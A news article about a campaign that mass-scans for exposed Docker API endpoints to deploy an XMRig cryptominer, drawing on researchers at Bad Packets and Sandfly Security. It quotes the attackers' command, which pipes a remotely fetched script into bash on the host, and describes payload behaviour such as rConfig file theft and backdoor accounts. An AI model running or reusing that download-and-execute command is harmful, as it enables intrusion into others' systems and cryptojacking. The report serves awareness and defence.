Researchers have discovered that a hacking group is massively scanning the internet looking for Docker platforms that have API endpoints exposed to the internet.
Hackers are conducting the scans with the aim of deploying a cryptominer on the exposed Docker platforms and stealing money.
Professionals behind the hacking campaign
According to researchers, the massive internet scanning campaign began over the weekend of November 24. It immediately caught the attention of researchers due to its vast scope.
Troy Mursch, lead researcher and co-founder of Bad Packets LLC, said that exploiting exposed Docker platforms is nothing new. It happens often.
“What made this campaign stand out was the large scope of the scan. That alone required further investigation to find out where this botnet,” he said.
What information do we have so far?
So far , researchers have discovered that the hacking group responsible for this campaign has already scanned more than 59,000 IP networks (netblocks) looking for exposed Docker platforms.
If a vulnerable machine is detected, hackers use the API endpoint to launch an Alpine Linux OS container, where they execute the following command:
chroot / mnt / bin / sh -c 'curl-sL4 https://ix.io/1XQa | bash?
This command downloads and executes a Bash script from the attackers’ server. This script then installs an XMRRig cryptominer. According to Mursch, over the weekend, the hackers stole 14.82 Monero (XMR) coins, worth just under $740.

Another thing the researchers noticed is that the malware installed by hackers has a self-defense measure.
“A unique but interesting feature of this campaign is that it uninstalls known tracking programs and kills various processes, via a script downloaded from http://ix[.]io/1XQh,” Mursch said.
This script disables products security, as well as processes, associated with rival cryptomining botnets, such as DDG.
Additionally, Mursch discovered that the malicious script has another function, which scans the infected computer for rConfig configuration files. The script encrypts and steals the files and sends them to the attackers' command and control server.
Craig H. Rowland, founder of Sandfly Security, also observed that hackers create backdoor accounts in hacked containers and leave behind SSH keys so they can have easier access and remotely control all infected bots.
For now, Mursch recommends that all users and companies running Docker platforms check for exposed API endpoints on the internet and take immediate action.
